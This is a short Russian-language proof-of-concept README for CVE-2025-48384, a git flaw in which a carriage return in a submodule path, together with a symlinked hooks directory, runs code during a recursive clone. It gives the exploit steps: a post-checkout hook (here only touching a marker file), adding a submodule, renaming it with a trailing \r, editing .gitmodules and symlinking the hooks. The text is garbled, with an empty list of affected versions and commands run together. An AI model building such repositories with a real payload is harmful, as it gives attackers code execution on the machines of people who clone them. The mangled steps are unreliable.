
PoC для CVE-2025-48384
CVE-2025-48384 представляет собой уязвимость неправильной обработки символических ссылок (следование по ссылкам) в git. В частности, имена файлов с символами возврата каретки неправильно обрабатываются в .git/config, и включение символической ссылки, указывающей на исполняемый файл хука git, находящийся в подмодуле, как директории хуков подмодуля, может привести к выполнению произвольного кода при клонировании репозитория с помощью git clone --recursive.
Git для Microsoft Windows не подвержен этой уязвимости, в основном уязвимыми остаются конкретные версии git на Linux и MacOS. Затронутые версии:
post-checkout для выполнения кода при рекурсивном клонировании репозитория poc:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git subgit mv sub $(printf "sub\r")printf "\tpath = \"sub\r\"\n" в .gitmodules и удалите исходный путь.ln -s .git/modules/sub/hooks sub